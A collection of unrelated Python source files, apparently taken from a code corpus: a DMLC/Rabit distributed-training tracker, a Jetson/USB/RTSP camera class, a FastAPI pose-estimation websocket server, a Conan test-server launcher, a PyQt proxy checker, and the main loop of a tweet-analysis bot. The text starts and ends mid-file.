t.append(threading.Thread(target=processData, args=(ii, start_index, int(samples[ii]), federated, validation_train, number_of_batches, parameter_server, samples)))
t[ii].start()
# last process is for the target server
if parameter_server:
print("Target server starting with active devices {}".format(active_devices_per_round))
t.append(threading.Thread(target=processParameterServer, args=(devices, active_devices_per_round, federated)))
t[devices].start()
else: # run centralized learning on device 0 (data center)
processData(0, 0, training_set_per_device*devices, federated, validation_train, number_of_batches, parameter_server, samples)
exit(0)
|
tracker.py
|
"""
Tracker script for DMLC
Implements the tracker control protocol
- start dmlc jobs
- start ps scheduler and rabit tracker
- help nodes to establish links with each other
Tianqi Chen
"""
# pylint: disable=invalid-name, missing-docstring, too-many-arguments, too-many-locals
# pylint: disable=too-many-branches, too-many-statements
from __future__ import absolute_import
import os
import sys
import socket
import struct
import subprocess
import argparse
import time
import logging
from threading import Thread
class ExSocket(object):
"""
Extension of socket to handle recv and send of special data
"""
def __init__(self, sock):
self.sock = sock
def recvall(self, nbytes):
res = []
nread = 0
while nread < nbytes:
chunk = self.sock.recv(min(nbytes - nread, 1024))
nread += len(chunk)
res.append(chunk)
        return b''.join(res)
def recvint(self):
return struct.unpack('@i', self.recvall(4))[0]
def sendint(self, n):
self.sock.sendall(struct.pack('@i', n))
    def sendstr(self, s):
        data = s.encode()
        self.sendint(len(data))
        self.sock.sendall(data)
    def recvstr(self):
        slen = self.recvint()
        return self.recvall(slen).decode()
# magic number used to verify existence of data
kMagic = 0xff99
def get_some_ip(host):
return socket.getaddrinfo(host, None)[0][4][0]
def get_family(addr):
return socket.getaddrinfo(addr, None)[0][0]
class SlaveEntry(object):
def __init__(self, sock, s_addr):
slave = ExSocket(sock)
self.sock = slave
self.host = get_some_ip(s_addr[0])
magic = slave.recvint()
assert magic == kMagic, 'invalid magic number=%d from %s' % (magic, self.host)
slave.sendint(kMagic)
self.rank = slave.recvint()
self.world_size = slave.recvint()
self.jobid = slave.recvstr()
self.cmd = slave.recvstr()
self.wait_accept = 0
self.port = None
def decide_rank(self, job_map):
if self.rank >= 0:
return self.rank
if self.jobid != 'NULL' and self.jobid in job_map:
return job_map[self.jobid]
return -1
def assign_rank(self, rank, wait_conn, tree_map, parent_map, ring_map):
self.rank = rank
nnset = set(tree_map[rank])
rprev, rnext = ring_map[rank]
self.sock.sendint(rank)
# send parent rank
self.sock.sendint(parent_map[rank])
# send world size
self.sock.sendint(len(tree_map))
self.sock.sendint(len(nnset))
# send the rprev and next link
for r in nnset:
self.sock.sendint(r)
# send prev link
if rprev != -1 and rprev != rank:
nnset.add(rprev)
self.sock.sendint(rprev)
else:
self.sock.sendint(-1)
# send next link
if rnext != -1 and rnext != rank:
nnset.add(rnext)
self.sock.sendint(rnext)
else:
self.sock.sendint(-1)
while True:
ngood = self.sock.recvint()
goodset = set([])
            for _ in range(ngood):
goodset.add(self.sock.recvint())
assert goodset.issubset(nnset)
badset = nnset - goodset
conset = []
for r in badset:
if r in wait_conn:
conset.append(r)
self.sock.sendint(len(conset))
self.sock.sendint(len(badset) - len(conset))
for r in conset:
self.sock.sendstr(wait_conn[r].host)
self.sock.sendint(wait_conn[r].port)
self.sock.sendint(r)
nerr = self.sock.recvint()
if nerr != 0:
continue
self.port = self.sock.recvint()
rmset = []
            # all connections were successfully set up
for r in conset:
wait_conn[r].wait_accept -= 1
if wait_conn[r].wait_accept == 0:
rmset.append(r)
for r in rmset:
wait_conn.pop(r, None)
self.wait_accept = len(badset) - len(conset)
return rmset
class RabitTracker(object):
"""
tracker for rabit
"""
def __init__(self, hostIP, nslave, port=9091, port_end=9999):
sock = socket.socket(get_family(hostIP), socket.SOCK_STREAM)
for port in range(port, port_end):
try:
sock.bind((hostIP, port))
self.port = port
break
except socket.error as e:
if e.errno == 98:
continue
else:
raise
sock.listen(256)
self.sock = sock
self.hostIP = hostIP
self.thread = None
self.start_time = None
self.end_time = None
self.nslave = nslave
logging.info('start listen on %s:%d', hostIP, self.port)
def __del__(self):
self.sock.close()
@staticmethod
def get_neighbor(rank, nslave):
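        # Neighbours of `rank` in a binary-heap layout (all 0-indexed): the parent
        # and up to two children. For example, with nslave=7, rank 0 links to 1 and 2,
        # and rank 1 links to 0, 3 and 4.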
rank = rank + 1
ret = []
if rank > 1:
            ret.append(rank // 2 - 1)
if rank * 2 - 1 < nslave:
ret.append(rank * 2 - 1)
if rank * 2 < nslave:
ret.append(rank * 2)
return ret
def slave_envs(self):
"""
        get environment variables for slaves
can be passed in as args or envs
"""
return {'DMLC_TRACKER_URI': self.hostIP,
'DMLC_TRACKER_PORT': self.port}
def get_tree(self, nslave):
tree_map = {}
parent_map = {}
for r in range(nslave):
tree_map[r] = self.get_neighbor(r, nslave)
            parent_map[r] = (r + 1) // 2 - 1
return tree_map, parent_map
def find_share_ring(self, tree_map, parent_map, r):
"""
get a ring structure that tends to share nodes with the tree
return a list starting from r
"""
nset = set(tree_map[r])
cset = nset - set([parent_map[r]])
if len(cset) == 0:
return [r]
rlst = [r]
cnt = 0
for v in cset:
vlst = self.find_share_ring(tree_map, parent_map, v)
cnt += 1
if cnt == len(cset):
vlst.reverse()
rlst += vlst
return rlst
def get_ring(self, tree_map, parent_map):
"""
get a ring connection used to recover local data
"""
assert parent_map[0] == -1
rlst = self.find_share_ring(tree_map, parent_map, 0)
assert len(rlst) == len(tree_map)
ring_map = {}
nslave = len(tree_map)
for r in range(nslave):
rprev = (r + nslave - 1) % nslave
rnext = (r + 1) % nslave
ring_map[rlst[r]] = (rlst[rprev], rlst[rnext])
return ring_map
def get_link_map(self, nslave):
"""
get the link map, this is a bit hacky, call for better algorithm
to place similar nodes together
"""
tree_map, parent_map = self.get_tree(nslave)
ring_map = self.get_ring(tree_map, parent_map)
rmap = {0 : 0}
k = 0
for i in range(nslave - 1):
k = ring_map[k][1]
rmap[k] = i + 1
ring_map_ = {}
tree_map_ = {}
parent_map_ = {}
for k, v in ring_map.items():
ring_map_[rmap[k]] = (rmap[v[0]], rmap[v[1]])
for k, v in tree_map.items():
tree_map_[rmap[k]] = [rmap[x] for x in v]
for k, v in parent_map.items():
if k != 0:
parent_map_[rmap[k]] = rmap[v]
else:
parent_map_[rmap[k]] = -1
return tree_map_, parent_map_, ring_map_
def accept_slaves(self, nslave):
        # set of nodes that finished the job
shutdown = {}
# set of nodes that is waiting for connections
wait_conn = {}
# maps job id to rank
job_map = {}
# list of workers that is pending to be assigned rank
pending = []
# lazy initialize tree_map
tree_map = None
while len(shutdown) != nslave:
fd, s_addr = self.sock.accept()
s = SlaveEntry(fd, s_addr)
if s.cmd == 'print':
msg = s.sock.recvstr()
logging.info(msg.strip())
continue
if s.cmd == 'shutdown':
assert s.rank >= 0 and s.rank not in shutdown
assert s.rank not in wait_conn
shutdown[s.rank] = s
                logging.debug('Receive %s signal from %d', s.cmd, s.rank)
continue
assert s.cmd == 'start' or s.cmd == 'recover'
# lazily initialize the slaves
if tree_map is None:
assert s.cmd == 'start'
if s.world_size > 0:
nslave = s.world_size
tree_map, parent_map, ring_map = self.get_link_map(nslave)
# set of nodes that is pending for getting up
                todo_nodes = list(range(nslave))
else:
assert s.world_size == -1 or s.world_size == nslave
if s.cmd == 'recover':
assert s.rank >= 0
rank = s.decide_rank(job_map)
# batch assignment of ranks
if rank == -1:
assert len(todo_nodes) != 0
pending.append(s)
if len(pending) == len(todo_nodes):
pending.sort(key=lambda x: x.host)
for s in pending:
rank = todo_nodes.pop(0)
if s.jobid != 'NULL':
job_map[s.jobid] = rank
s.assign_rank(rank, wait_conn, tree_map, parent_map, ring_map)
if s.wait_accept > 0:
wait_conn[rank] = s
                        logging.debug('Receive %s signal from %s; assign rank %d',
                                      s.cmd, s.host, s.rank)
if len(todo_nodes) == 0:
logging.info('@tracker All of %d nodes getting started', nslave)
self.start_time = time.time()
else:
s.assign_rank(rank, wait_conn, tree_map, parent_map, ring_map)
                logging.debug('Receive %s signal from %d', s.cmd, s.rank)
if s.wait_accept > 0:
wait_conn[rank] = s
        logging.info('@tracker All nodes finished their jobs')
self.end_time = time.time()
logging.info('@tracker %s secs between node start and job finish',
str(self.end_time - self.start_time))
def start(self, nslave):
def run():
self.accept_slaves(nslave)
self.thread = Thread(target=run, args=())
        self.thread.daemon = True
self.thread.start()
def join(self):
        while self.thread.is_alive():
self.thread.join(100)
class PSTracker(object):
"""
Tracker module for PS
"""
def __init__(self, hostIP, cmd, port=9091, port_end=9999, envs=None):
"""
Starts the PS scheduler
"""
self.cmd = cmd
if cmd is None:
return
envs = {} if envs is None else envs
self.hostIP = hostIP
sock = socket.socket(get_family(hostIP), socket.SOCK_STREAM)
for port in range(port, port_end):
try:
sock.bind(('', port))
self.port = port
sock.close()
break
except socket.error:
continue
env = os.environ.copy()
env['DMLC_ROLE'] = 'scheduler'
env['DMLC_PS_ROOT_URI'] = str(self.hostIP)
env['DMLC_PS_ROOT_PORT'] = str(self.port)
for k, v in envs.items():
env[k] = str(v)
self.thread = Thread(
target=(lambda: subprocess.check_call(self.cmd, env=env, shell=True)), args=())
        self.thread.daemon = True
self.thread.start()
def join(self):
if self.cmd is not None:
            while self.thread.is_alive():
self.thread.join(100)
def slave_envs(self):
if self.cmd is None:
return {}
else:
return {'DMLC_PS_ROOT_URI': self.hostIP,
'DMLC_PS_ROOT_PORT': self.port}
def get_host_ip(hostIP=None):
if hostIP is None or hostIP == 'auto':
hostIP = 'ip'
if hostIP == 'dns':
hostIP = socket.getfqdn()
elif hostIP == 'ip':
from socket import gaierror
try:
hostIP = socket.gethostbyname(socket.getfqdn())
except gaierror:
logging.warn('gethostbyname(socket.getfqdn()) failed... trying on hostname()')
hostIP = socket.gethostbyname(socket.gethostname())
if hostIP.startswith("127."):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
# doesn't have to be reachable
s.connect(('10.255.255.255', 0))
hostIP = s.getsockname()[0]
return hostIP
def submit(nworker, nserver, fun_submit, hostIP='auto', pscmd=None):
if nserver == 0:
pscmd = None
envs = {'DMLC_NUM_WORKER' : nworker,
'DMLC_NUM_SERVER' : nserver}
hostIP = get_host_ip(hostIP)
if nserver == 0:
rabit = RabitTracker(hostIP=hostIP, nslave=nworker)
envs.update(rabit.slave_envs())
rabit.start(nworker)
else:
pserver = PSTracker(hostIP=hostIP, cmd=pscmd, envs=envs)
envs.update(pserver.slave_envs())
fun_submit(nworker, nserver, envs)
if nserver == 0:
rabit.join()
else:
pserver.join()
def start_rabit_tracker(args):
"""Standalone function to start rabit tracker.
Parameters
----------
args: arguments to start the rabit tracker.
"""
envs = {'DMLC_NUM_WORKER' : args.num_workers,
'DMLC_NUM_SERVER' : args.num_servers}
rabit = RabitTracker(hostIP=get_host_ip(args.host_ip), nslave=args.num_workers)
envs.update(rabit.slave_envs())
rabit.start(args.num_workers)
sys.stdout.write('DMLC_TRACKER_ENV_START\n')
# simply write configuration to stdout
for k, v in envs.items():
sys.stdout.write('%s=%s\n' % (k, str(v)))
sys.stdout.write('DMLC_TRACKER_ENV_END\n')
sys.stdout.flush()
rabit.join()
def main():
"""Main function if tracker is executed in standalone mode."""
parser = argparse.ArgumentParser(description='Rabit Tracker start.')
parser.add_argument('--num-workers', required=True, type=int,
                        help='Number of worker processes to be launched.')
parser.add_argument('--num-servers', default=0, type=int,
                        help='Number of server processes to be launched. Only used in PS jobs.')
parser.add_argument('--host-ip', default=None, type=str,
                        help=('Host IP address; this is only needed ' +
'if the host IP cannot be automatically guessed.'))
parser.add_argument('--log-level', default='INFO', type=str,
choices=['INFO', 'DEBUG'],
help='Logging level of the logger.')
args = parser.parse_args()
fmt = '%(asctime)s %(levelname)s %(message)s'
if args.log_level == 'INFO':
level = logging.INFO
elif args.log_level == 'DEBUG':
level = logging.DEBUG
else:
raise RuntimeError("Unknown logging level %s" % args.log_level)
logging.basicConfig(format=fmt, level=level)
if args.num_servers == 0:
start_rabit_tracker(args)
else:
raise RuntimeError("Do not yet support start ps tracker in standalone mode.")
if __name__ == "__main__":
main()
|
camera.py
|
"""camera.py
This code implements the Camera class, which encapsulates code to
handle IP CAM, USB webcam or the Jetson onboard camera. In
addition, this Camera class is further extended to take a video
file or an image file as input.
"""
import logging
import threading
import subprocess
import numpy as np
import cv2
# The following flag is used to control whether to use a GStreamer
# pipeline to open USB webcam source. If set to False, we just open
# the webcam using cv2.VideoCapture(index) machinery. i.e. relying
# on cv2's built-in function to capture images from the webcam.
USB_GSTREAMER = True
def add_camera_args(parser):
"""Add parser augument for camera options."""
parser.add_argument('--file', dest='use_file',
help='use a video file as input (remember to '
'also set --filename)',
action='store_true')
parser.add_argument('--image', dest='use_image',
help='use an image file as input (remember to '
'also set --filename)',
action='store_true')
parser.add_argument('--filename', dest='filename',
help='video file name, e.g. test.mp4',
default=None, type=str)
parser.add_argument('--rtsp', dest='use_rtsp',
help='use IP CAM (remember to also set --uri)',
action='store_true')
parser.add_argument('--uri', dest='rtsp_uri',
help='RTSP URI, e.g. rtsp://192.168.1.64:554',
default=None, type=str)
parser.add_argument('--latency', dest='rtsp_latency',
help='latency in ms for RTSP [200]',
default=200, type=int)
parser.add_argument('--usb', dest='use_usb',
help='use USB webcam (remember to also set --vid)',
action='store_true')
parser.add_argument('--vid', dest='video_dev',
help='device # of USB webcam (/dev/video?) [0]',
default=0, type=int)
parser.add_argument('--width', dest='image_width',
help='image width [640]',
default=640, type=int)
parser.add_argument('--height', dest='image_height',
help='image height [480]',
default=480, type=int)
return parser
def open_cam_rtsp(uri, width, height, latency):
"""Open an RTSP URI (IP CAM)."""
gst_elements = str(subprocess.check_output('gst-inspect-1.0'))
if 'omxh264dec' in gst_elements:
# Use hardware H.264 decoder on Jetson platforms
gst_str = ('rtspsrc location={} latency={} ! '
'rtph264depay ! h264parse ! omxh264dec ! '
'nvvidconv ! '
'video/x-raw, width=(int){}, height=(int){}, '
'format=(string)BGRx ! videoconvert ! '
'appsink').format(uri, latency, width, height)
elif 'avdec_h264' in gst_elements:
# Otherwise try to use the software decoder 'avdec_h264'
# NOTE: in case resizing images is necessary, try adding
# a 'videoscale' into the pipeline
gst_str = ('rtspsrc location={} latency={} ! '
'rtph264depay ! h264parse ! avdec_h264 ! '
'videoconvert ! appsink').format(uri, latency)
else:
raise RuntimeError('H.264 decoder not found!')
return cv2.VideoCapture(gst_str, cv2.CAP_GSTREAMER)
def open_cam_usb(dev, width, height):
"""Open a USB webcam."""
if USB_GSTREAMER:
gst_str = ('v4l2src device=/dev/video{} ! '
'video/x-raw, width=(int){}, height=(int){} ! '
'videoconvert ! appsink').format(dev, width, height)
return cv2.VideoCapture(gst_str, cv2.CAP_GSTREAMER)
else:
return cv2.VideoCapture(dev)
def open_cam_onboard(width, height):
"""Open the Jetson onboard camera."""
gst_elements = str(subprocess.check_output('gst-inspect-1.0'))
if 'nvcamerasrc' in gst_elements:
# On versions of L4T prior to 28.1, you might need to add
# 'flip-method=2' into gst_str below.
gst_str = ('nvcamerasrc ! '
'video/x-raw(memory:NVMM), '
'width=(int)2592, height=(int)1458, '
'format=(string)I420, framerate=(fraction)30/1 ! '
'nvvidconv ! '
'video/x-raw, width=(int){}, height=(int){}, '
'format=(string)BGRx ! '
'videoconvert ! appsink').format(width, height)
elif 'nvarguscamerasrc' in gst_elements:
gst_str = ('nvarguscamerasrc ! '
'video/x-raw(memory:NVMM), '
'width=(int)1920, height=(int)1080, '
'format=(string)NV12, framerate=(fraction)30/1 ! '
'nvvidconv flip-method=2 ! '
'video/x-raw, width=(int){}, height=(int){}, '
'format=(string)BGRx ! '
'videoconvert ! appsink').format(width, height)
else:
raise RuntimeError('onboard camera source not found!')
return cv2.VideoCapture(gst_str, cv2.CAP_GSTREAMER)
def grab_img(cam):
"""This 'grab_img' function is designed to be run in the sub-thread.
Once started, this thread continues to grab a new image and put it
into the global 'img_handle', until 'thread_running' is set to False.
"""
while cam.thread_running:
_, cam.img_handle = cam.cap.read()
if cam.img_handle is None:
logging.warning('grab_img(): cap.read() returns None...')
break
cam.thread_running = False
class Camera():
"""Camera class which supports reading images from theses video sources:
1. Video file
2. Image (jpg, png, etc.) file, repeating indefinitely
3. RTSP (IP CAM)
4. USB webcam
5. Jetson onboard camera
"""
def __init__(self, args):
self.args = args
self.is_opened = False
self.use_thread = False
self.thread_running = False
self.img_handle = None
self.img_width = 0
self.img_height = 0
self.cap = None
self.thread = None
def open(self):
"""Open camera based on command line arguments."""
assert self.cap is None, 'Camera is already opened!'
args = self.args
if args.use_file:
self.cap = cv2.VideoCapture(args.filename)
# ignore image width/height settings here
self.use_thread = False
elif args.use_image:
self.cap = 'OK'
self.img_handle = cv2.imread(args.filename)
# ignore image width/height settings here
if self.img_handle is not None:
self.is_opened = True
self.img_height, self.img_width, _ = self.img_handle.shape
self.use_thread = False
elif args.use_rtsp:
self.cap = open_cam_rtsp(
args.rtsp_uri,
args.image_width,
args.image_height,
args.rtsp_latency
)
self.use_thread = True
elif args.use_usb:
self.cap = open_cam_usb(
args.video_dev,
args.image_width,
args.image_height
)
self.use_thread = True
else: # by default, use the jetson onboard camera
self.cap = open_cam_onboard(
args.image_width,
args.image_height
)
self.use_thread = True
if self.cap != 'OK':
if self.cap.isOpened():
# Try to grab the 1st image and determine width and height
_, img = self.cap.read()
if img is not None:
self.img_height, self.img_width, _ = img.shape
self.is_opened = True
def start(self):
assert not self.thread_running
if self.use_thread:
self.thread_running = True
self.thread = threading.Thread(target=grab_img, args=(self,))
self.thread.start()
def stop(self):
self.thread_running = False
if self.use_thread:
self.thread.join()
def read(self):
if self.args.use_file:
_, img = self.cap.read()
if img is None:
#logging.warning('grab_img(): cap.read() returns None...')
# looping around
self.cap.release()
self.cap = cv2.VideoCapture(self.args.filename)
_, img = self.cap.read()
return img
elif self.args.use_image:
return np.copy(self.img_handle)
else:
return self.img_handle
def release(self):
assert not self.thread_running
if self.cap != 'OK':
self.cap.release()
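# --- Usage sketch (not part of the original module) ---------------------------
# A minimal, hedged example of how this Camera class is typically driven:
# parse the camera arguments, open the source, start the grabber thread,
# read frames in a loop, then shut everything down.  The window name and the
# Esc-to-quit handling below are illustrative choices, not project APIs.
if __name__ == '__main__':
    import argparse
    import time
    parser = add_camera_args(argparse.ArgumentParser())
    args = parser.parse_args()
    cam = Camera(args)
    cam.open()                       # open the selected video source
    if not cam.is_opened:
        raise SystemExit('Failed to open the camera source')
    cam.start()                      # start the frame-grabbing thread (if used)
    try:
        while True:
            img = cam.read()
            if img is None:          # no frame yet (threaded source still warming up)
                time.sleep(0.01)
                continue
            cv2.imshow('camera-demo', img)
            if cv2.waitKey(1) & 0xFF == 27:   # Esc quits the demo
                break
    finally:
        cam.stop()
        cam.release()
        cv2.destroyAllWindows()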
|
main.py
|
from collections import defaultdict
from getpass import getuser
from fastapi import FastAPI, WebSocket
import uvicorn
import poseEstimation
import mediapipe as mp
import calculator as calc
import time, threading, queue
import datetime as dt
import json
app = FastAPI(title='ESMA API')
mpPose = mp.solutions.pose
class connectionUser:
def __init__(self, id, pose):
self.id = id
self.currFrame = None
self.pose = pose
self.currExercise = None
self.features = defaultdict(int)
self.hasBeenUp = False
self.queue = []
self.prediction = []
    id: str
    pose: any
    currFrame: str
    currExercise: str
    features: dict
    hasBeenUp: bool
    queue: list
    prediction: any
connections = []
def startTime(connection):
queueThread = threading.Thread(target=updateQueue, args=(connection,))
queueThread.daemon = True
queueThread.start()
checkQueueThread = threading.Thread(target=updateFrames, args=(connection,))
checkQueueThread.daemon = True
checkQueueThread.start()
def updateQueue(connection):
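    # Ticks roughly 24 times per second (1/24 s ≈ 0.04166 s); the modulo against the
    # elapsed time keeps the wake-ups aligned to starttimes so drift does not accumulate.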
starttimes = time.time()
while True:
connection.queue.append(connection)
time.sleep(0.04166 - ((time.time() - starttimes) % 0.04166))
def updateFrames(connection):
while True:
if(connection.queue):
poseEstimation.receivedFrameData(connection.queue[0])
connection.queue.pop(0)
def updateConnection (clientData):
user = next(x for x in connections if x.id == clientData["id"])
if(user):
user.currFrame = clientData["frame"]
user.currExercise = clientData["exerciseType"]
def getUser (id):
return next(x for x in connections if x.id == id)
@app.websocket("/ws")
async def websocket_endpoint(websocket: WebSocket):
await websocket.accept()
while True:
try:
data = await websocket.receive_json()
if(data["type"] == "init"):
connections.append(connectionUser(data["id"], mpPose.Pose()))
connection = getUser(data["id"]);
thread = threading.Thread(target=startTime, args=(connection,))
thread.daemon = True
thread.start()
else:
updateConnection(data)
user = getUser(data["id"])
if(user.prediction):
if(user.prediction[0] > 0.9):
await websocket.send_text("correct")
print("correct ", user.prediction[0])
else:
await websocket.send_text("incorrect")
print("incorrect ", user.prediction[0])
#print(json.dumps(user.prediction))
user.prediction = []
except Exception as e:
print("error: ", e)
break
if __name__ == "__main__":
uvicorn.run(app, host="0.0.0.0", port=5000)
|
server_launcher.py
|
#!/usr/bin/python
from conans.server.service.authorize import BasicAuthorizer, BasicAuthenticator
import os
from conans.server.conf import get_file_manager
from conans.server.rest.server import ConanServer
from conans.server.crypto.jwt.jwt_credentials_manager import JWTCredentialsManager
from conans.server.crypto.jwt.jwt_updown_manager import JWTUpDownAuthManager
from conans.util.log import logger
from conans.util.files import mkdir
from conans.test.utils.test_files import temp_folder
from conans.server.migrate import migrate_and_get_server_config
from conans.search.search import DiskSearchAdapter, DiskSearchManager
from conans.paths import SimplePaths
import time
import shutil
from conans import SERVER_CAPABILITIES
TESTING_REMOTE_PRIVATE_USER = "private_user"
TESTING_REMOTE_PRIVATE_PASS = "private_pass"
class TestServerLauncher(object):
port = 0
def __init__(self, base_path=None, read_permissions=None,
write_permissions=None, users=None, base_url=None, plugins=None,
server_version=None,
min_client_compatible_version=None,
server_capabilities=None):
plugins = plugins or []
if not base_path:
base_path = temp_folder()
if server_capabilities is None:
server_capabilities = SERVER_CAPABILITIES # Default enabled
if not os.path.exists(base_path):
raise Exception("Base path not exist! %s")
        # Define storage_folder; if not set, it will be read from the conf file and point to the real user home
self.storage_folder = os.path.join(base_path, ".conan_server", "data")
mkdir(self.storage_folder)
server_config = migrate_and_get_server_config(base_path, self.storage_folder)
if TestServerLauncher.port == 0:
TestServerLauncher.port = server_config.port
# Encode and Decode signature for Upload and Download service
updown_auth_manager = JWTUpDownAuthManager(server_config.updown_secret,
server_config.authorize_timeout)
self.file_manager = get_file_manager(server_config, public_url=base_url,
updown_auth_manager=updown_auth_manager)
search_adapter = DiskSearchAdapter()
self.search_manager = DiskSearchManager(SimplePaths(server_config.disk_storage_path), search_adapter)
# Prepare some test users
if not read_permissions:
read_permissions = server_config.read_permissions
read_permissions.append(("private_library/1.0.0@private_user/testing", "*"))
read_permissions.append(("*/*@*/*", "*"))
if not write_permissions:
write_permissions = server_config.write_permissions
if not users:
users = dict(server_config.users)
users[TESTING_REMOTE_PRIVATE_USER] = TESTING_REMOTE_PRIVATE_PASS
authorizer = BasicAuthorizer(read_permissions, write_permissions)
authenticator = BasicAuthenticator(users)
credentials_manager = JWTCredentialsManager(server_config.jwt_secret,
server_config.jwt_expire_time)
logger.debug("Storage path: %s" % self.storage_folder)
self.port = TestServerLauncher.port
self.ra = ConanServer(self.port, credentials_manager, updown_auth_manager,
authorizer, authenticator, self.file_manager, self.search_manager,
server_version, min_client_compatible_version,
server_capabilities)
for plugin in plugins:
self.ra.api_v1.install(plugin)
def start(self, daemon=True):
"""from multiprocessing import Process
self.p1 = Process(target=ra.run, kwargs={"host": "0.0.0.0"})
self.p1.start()
self.p1"""
import threading
class StoppableThread(threading.Thread):
"""Thread class with a stop() method. The thread itself has to check
regularly for the stopped() condition."""
            def __init__(self, *args, **kwargs):
                super(StoppableThread, self).__init__(*args, **kwargs)
                # Thread already defines an internal _stop method in Python 3, so use a distinct attribute name
                self._stop_event = threading.Event()
            def stop(self):
                self._stop_event.set()
            def stopped(self):
                return self._stop_event.is_set()
self.t1 = StoppableThread(target=self.ra.run, kwargs={"host": "0.0.0.0", "quiet": True})
self.t1.daemon = daemon
self.t1.start()
time.sleep(1)
def stop(self):
self.ra.root_app.close()
self.t1.stop()
def clean(self):
if os.path.exists(self.storage_folder):
try:
shutil.rmtree(self.storage_folder)
except:
print("Can't clean the test server data, probably a server process is still opened")
if __name__ == "__main__":
server = TestServerLauncher()
server.start(daemon=False)
|
set_proxy.py
|
from PyQt5.QtWidgets import QDialog, QApplication
from PyQt5.uic import loadUi
from PyQt5.QtCore import pyqtSlot, Qt, pyqtSignal
import sys
import urllib.request
import urllib.error
import urllib.parse
import threading
class SetProxies(QDialog):
signal_update = pyqtSignal(str)
proxy_selected = pyqtSignal(str)
def __init__(self):
super().__init__()
loadUi('set_proxy.ui', self)
        self.setWindowFlags(Qt.WindowMaximizeButtonHint | Qt.WindowMinimizeButtonHint)
self.signal_update.connect(self.update_proxies_status)
self.active_proxies = []
self.selected_proxy = None
self.check_proxies_thread = None
self.proxies_checked = False
def update_proxies_status(self, message):
self.logList.addItem(message)
def on_proxiesList_itemClicked(self, item):
if self.proxies_checked:
ip = item.text()
if ip in self.active_proxies:
self.selected_proxy_label.setText(f'{ip} selected')
self.confirmButton.setEnabled(True)
self.selected_proxy = ip
else:
self.selected_proxy_label.setText(f'{ip} is broken, please select a working one')
self.confirmButton.setEnabled(False)
self.selected_proxy = None
@pyqtSlot()
def on_addButton_clicked(self):
self.proxiesList.addItem('0.0.0.0:0000')
self.proxiesList.setCurrentRow(self.proxiesList.count()-1)
self.proxiesList.currentItem().setFlags(Qt.ItemIsSelectable | Qt.ItemIsEditable |
Qt.ItemIsUserCheckable | Qt.ItemIsEnabled | Qt.ItemIsDragEnabled)
@pyqtSlot()
def on_removeButton_clicked(self):
self.proxiesList.takeItem(self.proxiesList.currentRow())
@pyqtSlot()
def on_confirmButton_clicked(self):
self.proxy_selected.emit(self.selected_proxy)
self.reject()
@pyqtSlot()
def on_checkproxiesButton_clicked(self):
        # a thread can only be started once, so construct a new one every time
self.check_proxies_thread = threading.Thread(target=self.check_proxies)
self.check_proxies_thread.start()
def check_proxies(self):
self.logList.clear()
self.mousePressEvent(None)
for i in range(self.proxiesList.count()):
ip = self.proxiesList.item(i).text()
try:
# check if proxy can connect to "https" site
proxy_handler = urllib.request.ProxyHandler({'https': ip})
opener = urllib.request.build_opener(proxy_handler)
opener.addheaders = [('User-agent', 'Mozilla/5.0')]
urllib.request.install_opener(opener)
req = urllib.request.Request('https://www.google.com')
                # set timeout to 5 s (the proxy is classified as broken if it cannot open Google within 5 seconds)
with urllib.request.urlopen(req, timeout=5):
self.signal_update.emit(f'\u2713: {ip} is working')
self.active_proxies.append(ip)
except Exception as detail:
self.signal_update.emit(f'\u2717: {ip} crashed, {detail}')
self.proxies_checked = True
def mousePressEvent(self, event):
if QApplication.focusWidget():
QApplication.focusWidget().clearFocus()
if __name__ == '__main__':
app = QApplication(sys.argv)
window = SetProxies()
window.show()
sys.exit(app.exec_())
|
main.py
|
from datetime import datetime
from http.server import BaseHTTPRequestHandler
from http.server import HTTPServer
from threading import Event
from threading import Thread
from time import sleep
from analysis import Analysis
from logs import Logs
from trading import Trading
from twitter import Twitter
# Whether to send all logs to the cloud instead of a local file.
LOGS_TO_CLOUD = True
# The duration of the smallest backoff step in seconds.
BACKOFF_STEP_S = 0.1
# The maximum number of retry steps, equivalent to 0.1 * (2^12 - 1) = 409.5
# seconds of total delay. This is the largest interval that one backoff
# sequence may take.
MAX_TRIES = 12
# The time in seconds after which to reset a backoff sequence. This is the
# smallest interval at which backoff sequences may repeat normally.
BACKOFF_RESET_S = 30 * 60
# The host for the monitor Web server.
MONITOR_HOST = '0.0.0.0'
# The port for the monitor Web server.
# MONITOR_PORT = 80
MONITOR_PORT = 1042
# The message returned by the monitor Web server.
MONITOR_MESSAGE = 'OK'
class Monitor:
"""A monitor exposing a Web server while the main loop is running."""
def __init__(self):
"""Creates a Web server on a background thread."""
self.server = HTTPServer((MONITOR_HOST, MONITOR_PORT),
self.MonitorHandler)
self.thread = Thread(target=self.server.serve_forever)
self.thread.daemon = True
def start(self):
"""Starts the Web server background thread."""
self.thread.start()
def stop(self):
"""Stops the Web server and background thread."""
self.server.shutdown()
self.server.server_close()
class MonitorHandler(BaseHTTPRequestHandler):
"""An HTTP request handler that responds with "OK" while running."""
def _set_headers(self):
self.send_response(200)
self.send_header('Content-type', 'text/plain')
self.end_headers()
def do_GET(self):
self._set_headers()
self.wfile.write(MONITOR_MESSAGE.encode('utf-8'))
def do_HEAD(self):
self._set_headers()
class Main:
"""A wrapper for the main application logic and retry loop."""
def __init__(self):
self.logs = Logs(name='main', to_cloud=LOGS_TO_CLOUD)
self.twitter = Twitter(logs_to_cloud=LOGS_TO_CLOUD)
def twitter_callback(self, tweet):
"""Analyzes Trump tweets, trades stocks, and tweets about it."""
# Initialize the Analysis, Logs, Trading, and Twitter instances inside
# the callback to create separate httplib2 instances per thread.
analysis = Analysis(logs_to_cloud=LOGS_TO_CLOUD)
logs = Logs(name='main-callback', to_cloud=LOGS_TO_CLOUD)
# Analyze the tweet.
companies = analysis.find_companies(tweet)
logs.info('Using companies: %s' % companies)
if not companies:
return
# Trade stocks.
# trading = Trading(logs_to_cloud=LOGS_TO_CLOUD)
# trading.make_trades(companies)
# Tweet about it.
twitter = Twitter(logs_to_cloud=LOGS_TO_CLOUD)
twitter.tweet(companies, tweet)
def run_session(self):
"""Runs a single streaming session. Logs and cleans up after
exceptions.
"""
self.logs.info('Starting new session.')
try:
self.twitter.start_streaming(self.twitter_callback)
except:
self.logs.catch()
finally:
self.twitter.stop_streaming()
self.logs.info('Ending session.')
def backoff(self, tries):
"""Sleeps an exponential number of seconds based on the number of
tries.
"""
delay = BACKOFF_STEP_S * pow(2, tries)
self.logs.warn('Waiting for %.1f seconds.' % delay)
sleep(delay)
def run(self):
"""Runs the main retry loop with exponential backoff."""
tries = 0
while True:
